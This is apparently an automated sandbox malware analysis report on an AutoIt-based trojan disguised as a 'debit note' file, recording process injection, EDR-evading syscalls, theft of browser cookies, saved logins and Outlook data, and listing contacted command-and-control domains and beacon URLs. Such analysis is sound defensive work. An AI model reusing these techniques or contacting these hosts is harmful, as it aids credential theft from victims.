                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363B6C0 mov eax, dword ptr fs:[00000030h]1_2_0363B6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC mov eax, dword ptr fs:[00000030h]1_2_036F16CC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 5216Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeJump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: A42008Jump to behavior
                Source: C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"Jump to behavior
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: PMZSowQBcVJqD.exe, 00000005.00000002.4096104712.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000005.00000000.1982209128.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000000.2134363496.00000000017D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                2
                Virtualization/Sandbox Evasion
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                412
                Process Injection
                LSASS Memory2
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Abuse Elevation Control Mechanism
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials12
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548308 Sample: debit#U00a0note#U00a0607-36... Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 28 www.deepfy.xyz 2->28 30 www.time-change.fyi 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 PMZSowQBcVJqD.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 xcopy.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 PMZSowQBcVJqD.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jivatop.online 185.179.189.193, 50051, 50052, 80 WEBHOST1-ASRU Russian Federation 22->34 36 www.5hdgb2p9a.buzz 168.76.221.252, 50047, 50048, 50049 ULTRANETSERVICOSEMINTERNETLTDABR South Africa 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe61%ReversingLabsWin32.Trojan.AutoitInject
                debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe100%AviraDR/AutoIt.Gen8
                debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://www.gmo.jp/images/public/common/logo.gif0%Avira URL Cloudsafe
                http://www.j252mv.site/0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.98yl9900.vip/vpuy/100%Avira URL Cloudmalware
                http://www.electronify.shop/3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                http://www.cursosonline.bio/uq6t/0%Avira URL Cloudsafe
                http://www.onamae.com/?banner_id=6340%Avira URL Cloudsafe
                http://www.deepfy.xyz/0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.prediksipreman.fyi/fy4q/0%Avira URL Cloudsafe
                http://www.mjmegartravel.online/vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.j252mv.site/0by3/0%Avira URL Cloudsafe
                http://www.sibeta.info/4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://www.dwmdconsulting.llc/kz8j/?Q8r=QgKs8ib8pSkW+zKBwipCHX7UMUqMF7yADzXTDGJ0XdB6OCHQraJ+KZU3DxhMouRtg+08egxU0v/OLmtErrB1+9oqLfJkb4rbcOK0NiMrGSL51W8rMrC8dsw=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.deepfy.xyz/0zsv/0%Avira URL Cloudsafe
                http://www.onamae-server.com/0%Avira URL Cloudsafe
                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer0%Avira URL Cloudsafe
                http://www.energyparks.net/87jo/0%Avira URL Cloudsafe
                http://www.5hdgb2p9a.buzz/lxjv/0%Avira URL Cloudsafe
                http://www.jivatop.online0%Avira URL Cloudsafe
                http://www.98yl9900.vip/vpuy/?Q8r=GohnPojKoDSo26eExaRPtq0fYHz1awKnkuX4rqCOwHJs0Om2tBI/qHVUK+LhjFCYnUGrzAuj4BG5Iu5ezVBqMm60AjojQL4Je3zYgtUuMeqMe2LW7C+ksjQ=&6trpq=anQT3n100%Avira URL Cloudmalware
                http://www.prediksipreman.fyi/fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.budged.net/rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.electronify.shop/3ase/0%Avira URL Cloudsafe
                http://www.time-change.fyi/tc13/?Q8r=SGbT8cdGn4hr6W9IQaErgA0XZ0/ODBbeE+rRSQfNCBVGsaJUOBN6Lk8UowuO+R8+qu85kOdeeMLFTNx1Fuyr7ECi1xcpiA8ny7JQ29NqIXoz/KZuCpX8Llg=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.5hdgb2p9a.buzz/lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU=0%Avira URL Cloudsafe
                http://www.mjmegartravel.online/vzdg/0%Avira URL Cloudsafe
                http://www.jivatop.online/kbf1/0%Avira URL Cloudsafe
                http://www.sibeta.info/4ecw/0%Avira URL Cloudsafe
                http://www.energyparks.net/87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n0%Avira URL Cloudsafe
                http://www.dwmdconsulting.llc/kz8j/0%Avira URL Cloudsafe
                http://www.time-change.fyi/tc13/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.time-change.fyi
                217.160.0.111
                truetrue
                  unknown
                  www.cursosonline.bio
                  199.59.243.227
                  truetrue
                    unknown
                    electronify.shop
                    84.32.84.32
                    truetrue
                      unknown
                      budged.net
                      195.154.200.15
                      truetrue
                        unknown
                        prediksipreman.fyi
                        162.0.215.244
                        truetrue
                          unknown
                          www.j252mv.site
                          150.95.254.16
                          truetrue
                            unknown
                            www.5hdgb2p9a.buzz
                            168.76.221.252
                            truetrue
                              unknown
                              www.jivatop.online
                              185.179.189.193
                              truetrue
                                unknown
                                dwmdconsulting.llc
                                3.33.130.190
                                truetrue
                                  unknown
                                  mjmegartravel.online
                                  76.223.67.189
                                  truetrue
                                    unknown
                                    www.deepfy.xyz
                                    199.59.243.227
                                    truetrue
                                      unknown
                                      www.98yl9900.vip
                                      104.21.3.144
                                      truetrue
                                        unknown
                                        www.sibeta.info
                                        162.0.231.203
                                        truetrue
                                          unknown
                                          energyparks.net
                                          3.33.130.190
                                          truetrue
                                            unknown
                                            www.prediksipreman.fyi
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.budged.net
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.mjmegartravel.online
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.energyparks.net
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.dwmdconsulting.llc
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.electronify.shop
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.98yl9900.vip/vpuy/true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.cursosonline.bio/uq6t/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.deepfy.xyz/0zsv/?Q8r=+k4oqFxRNocWibNOARfqv4VMC58QqhlZUZKcqPt4OXzeqjQirtEo6xCQlowbpjBKI3NLMSWGXVvwuRLD6mLhdQvHcmrKXdi5xtD9EO55lWtqmLshJCc1gWo=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.electronify.shop/3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mjmegartravel.online/vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.j252mv.site/0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3ntrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.prediksipreman.fyi/fy4q/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.deepfy.xyz/0zsv/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.j252mv.site/0by3/true
                                                        • Avira URL Cloud: safe
                                                        unknown
